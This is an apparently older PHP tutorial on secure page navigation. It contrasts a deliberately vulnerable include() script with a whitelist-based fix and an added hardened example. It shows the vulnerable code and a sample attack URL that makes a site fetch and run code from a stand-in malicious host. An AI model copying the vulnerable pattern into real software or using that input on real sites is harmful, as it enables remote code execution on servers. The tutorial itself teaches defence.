In the following tutorial I will explain how to write and understand a more secure navigation script. I am sure you have seen other navigation scripts; the difference is that those scripts open a security hole on your site, an SSI (Server Side Include) exploit to be exact.

Here is an example of the dangerous code:



<?php

// Deliberately vulnerable example: whatever the visitor puts in "url" is used
// in include() unchecked. With register_globals off (the default since PHP 4.2)
// the value has to be read from $_GET explicitly.
if(!isset($_GET['url']))
{
    $url = 'home';
}
else
{
    $url = $_GET['url'];
}

include($url . ".php");

?>


The above code says: if the "url" variable is set, include that page; otherwise include the predefined page. It looks secure enough, but anyone can make it include a file they control.

Here is an example URL: www.yournavscript.com/index.php?url=http://www.maliciouscodesite.com/badcode

This would fetch and run the malicious code on your server, with your site appending the ".php" extension to the supplied link.

I am sure you can see the problems with this result.

Here is the more secure option:



<?php

$default = "home.php";
$allowed = array (
    'index',
    'example',
);

if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
{
    // Prefer POST over GET; isset() avoids a notice when only one of them was sent.
    $page = isset( $_POST['P'] ) ? $_POST['P'] : $_GET['P'];
    // The third argument "true" makes in_array compare strictly (string === string).
    if( in_array( trim( $page ), $allowed, true ))
    {
        $file = trim( $page ) . ".php";
        if( file_exists( $file ))
        {
            include( $file );
        }
        else
        {
            include( $default );
        }
    }
    else
    {
        include( $default );
    }
}
else
{
    include( $default );
}

?>



$default = "home.php";
The default page that is included.


$allowed = array (
'index',
'example',
);
This is the Array of allowed page names; add as many as you need. Only a name that appears here can ever be included.


if( isset( $_POST['P'] ) || isset( $_GET['P'] ))
{
If the "P" variable is set (sent by POST or GET) then continue with the script; if not, include the default page.


$page = isset( $_POST['P'] ) ? $_POST['P'] : $_GET['P'];
Takes the value of "P" from POST if it was sent that way, otherwise from GET, and stores it in the "$page" variable.


if( in_array( trim( $page ), $allowed, true ))
{
Check whether the value in "$page" is in the "$allowed" Array. The "trim" part strips leading and trailing whitespace from the submitted value before it is compared, and the third argument makes the comparison strict.


$file = trim( $page ) . ".php";
Sets the value of $file to the name of the page you are requesting and appends the ".php" extension.


if( (file_exists( $file )))
{
include( $file );
}
If the file exists then include it ( "$file" ).


else
{
include( $default );
}
If the page is in the Array but the file is not found, include the default file.


else
{
include( $default );
}
}
If the page requested is not in the Array, include the default file.


else
{
include( $default );
}
If no request for a page is made include the default one.



That is the end of the script. You now have a more secure alternative for a site with PHP navigation. Just fill in the array with your page names and you are ready to go. If you wanted to extend the script you could add a file type checker as well.
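As an added example (not part of the original tutorial), here is the same whitelist idea taken one step further: instead of appending ".php" to whatever matched the list, the allowed keys map to fixed file paths, the key lookup is an exact match, and the resolved file is checked to live under a known directory before it is included. The PAGES map, the "pages/" directory, and the function names resolvePage and includeWithin are assumptions made up for this example.

```php
<?php
// Added example, not the tutorial's own code: a whitelist router that maps a
// short page key to a file path, matches the key exactly, and refuses anything else.
// The page keys, file names and the "pages" directory are constructed for this example.

declare(strict_types=1);

/** Allowed page keys and the files they resolve to. Nothing else can be included. */
const PAGES = [
    'home'    => 'pages/home.php',
    'index'   => 'pages/index.php',
    'example' => 'pages/example.php',
];

const DEFAULT_PAGE = 'home';

/**
 * Resolve a user-supplied page key to an allowed file path.
 * Returns the path for a known key and the default page's path for
 * anything else (missing, empty, or not in the whitelist).
 */
function resolvePage(?string $requested): string
{
    if ($requested === null) {
        return PAGES[DEFAULT_PAGE];
    }
    $key = trim($requested);
    // array_key_exists is an exact key match: "home/../x", "HOME" or "home\0" all fail.
    if (!array_key_exists($key, PAGES)) {
        return PAGES[DEFAULT_PAGE];
    }
    return PAGES[$key];
}

/**
 * Defence in depth: confirm the resolved file really lives under $baseDir
 * before including it, so a mistaken whitelist entry cannot point outside.
 * Returns false (and includes nothing) if the file is missing or outside $baseDir.
 */
function includeWithin(string $baseDir, string $file): bool
{
    $base = realpath($baseDir);
    $real = realpath($file);
    if ($base === false || $real === false) {
        return false;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    include $real;
    return true;
}

// Read the key from POST first, then GET, as the tutorial's script does.
// filter_input() returns null when the parameter is absent and false when it is
// not a plain string (for example ?P[]=x), so both cases fall back to the default.
$requested = filter_input(INPUT_POST, 'P', FILTER_DEFAULT)
          ?? filter_input(INPUT_GET, 'P', FILTER_DEFAULT);
if (!is_string($requested)) {
    $requested = null;
}

$file = resolvePage($requested);
if (!includeWithin(__DIR__ . '/pages', __DIR__ . '/' . $file)) {
    http_response_code(404);
    echo 'Page not found';
}
```

Because the request value is only ever used as a lookup key, it never reaches include() in any form; a request such as P=http://www.maliciouscodesite.com/badcode simply resolves to the default page. Independently of the script, keeping the PHP setting allow_url_include off (its default since PHP 5.2) stops include() from fetching remote URLs at all, which closes the hole shown in the first script even if a vulnerable copy of it is still on the server.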

Updates:
[Mon Sep 5, 2005 02:38 PM] One of the readers notified me of a bug in the script where it sets the page variable to "1". If you were using this script and couldn't get it to work, this is most likely the reason why.

If you have questions or comments please feel free to contact me: matt[@]mkeefedesign.com ( remove the "[" & "]" )